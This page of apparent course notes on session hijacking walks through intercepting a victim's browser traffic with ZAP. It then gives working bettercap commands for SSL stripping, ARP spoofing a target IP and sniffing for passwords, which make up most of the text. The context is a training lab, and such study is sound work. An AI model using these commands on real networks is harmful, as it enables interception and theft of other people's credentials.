1. Perform Session Hijacking

1. Hijack a session using Zed attack proxy (ZAP)

Set the browser proxy to go through Attack PC running ZAP. Now go to the break tab (same as intercept in Burp).

Now set the proxy settings

Click the Set break on all requests and responses icon on the main ZAP toolbar. This button sets and unsets a global breakpoint that will trap and display the next response or request from the victim's machine in the Break tab. Note: The Set break on all requests and responses icon turns automatically from green to red.

Now when the victim browses the sites, his request will be intercepted and we can forward request one by one. We can modify the parameter as we want.

2. Perform session hijacking with bettercap

Reference

MITM Labs/Bettercap Over Wifi - charlesreid1

Bettercap help

bettercap -h

Start bettercap

sudo bettercap -iface eth0

Type Help to list all commands.

To detect hosts on network

net.probe on
net.show

Now enable ssl strip (HTTPS to HTTP)

set http.proxy.sslstrip true

Now lets do the arp poisoning

set arp.spoof.fullduplex true
set arp.spoof.targets 192.168.29.33

Now turn on http proxy and sniffer

http.proxy on
net.sniff on

To set the sniffer to capture only passwords, we can use the following

set net.sniff.regexp '.*password=.+'

3. Intercept HTTP traffic using Hetty

Hetty | Hetty

PreviousModule 11. Session Hijacking Next2. Detect Session Hijacking

Last updated 1 year ago